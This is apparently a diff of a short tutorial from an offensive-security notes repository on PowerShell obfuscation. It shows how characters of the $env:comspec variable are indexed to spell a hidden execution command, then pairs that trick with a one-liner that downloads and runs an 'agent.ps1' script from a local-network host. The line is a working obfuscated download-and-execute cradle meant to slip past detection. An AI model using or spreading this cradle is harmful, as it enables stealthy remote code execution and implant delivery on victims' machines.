r00t-3xp10it/hacking-material-books/obfuscation/simple_obfuscation.md

 ![powershell obfuscation](http://i.cubeupload.com/G6rj4M.jpg)

-- Using **$env:comspec** (windows environment variable) and **-Join ''** to pull out the 4º,15º and 25º characters from $env:comspec variable and uses the **-Join ''** operator to take the arraw and convert it to a string.
+- Using **$env:comspec** (windows environment variable) and **-Join ''** to pull out the 4º,15º and 25º characters from $env:comspec variable and use the **-Join ''** operator to take the arraw and convert it to a string.

       $env:comspec[4,15,25]-Join '' (New-Object Net.WebClient).DownloadString('http://192.168.1.71/agent.ps1')